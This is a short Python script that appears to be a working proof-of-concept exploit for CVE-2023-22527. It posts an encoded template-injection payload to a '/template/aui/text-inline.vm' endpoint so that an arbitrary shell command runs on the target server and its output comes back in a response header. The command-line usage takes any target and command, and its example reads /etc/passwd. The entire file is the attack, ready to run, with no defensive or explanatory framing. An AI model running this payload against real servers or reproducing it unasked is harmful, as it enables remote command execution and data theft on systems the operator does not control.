# @Time    : 2024/1/23
# @Author  : jeyiuwai
# @File    : CVE-2023-22527.py
import argparse

import requests


def exploit(target, cmd):
    url = f"{target}/template/aui/text-inline.vm"
    # target = "http://192.168.11.136:8092"
    # cmd = "cat /etc/passwd"

    http_proxy = "http://127.0.0.1:8080"
    https_proxy = "http://127.0.0.1:8080"

    headers = {
        "Content-Type": "application/x-www-form-urlencoded"
    }
    data = r"label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({'" + cmd + "'}))"

    # response = requests.post(url, headers=headers, data=data, verify=False, proxies={"http": http_proxy, "https": https_proxy})
    response = requests.post(url, headers=headers, data=data, verify=False)
    if (response.headers.get("X-Cmd-Response")):
        print(response.headers.get("X-Cmd-Response"))
    else:
        print("No response")


def main():
    parser = argparse.ArgumentParser(
        description="Send request with target and cmd parameters",
        usage="python3 CVE-2023-22527.py --target <target> --cmd <cmd>\nExample: python3 CVE-2023-22527.py --target http://192.168.11.136:8092 --cmd \"cat /etc/passwd\""
    )
    parser.add_argument("--target", required=True, help="Target address")
    parser.add_argument("--cmd", required=True, help="Value for the cmd parameter")

    args = parser.parse_args()

    exploit(args.target, args.cmd)

if __name__ == "__main__":
    main()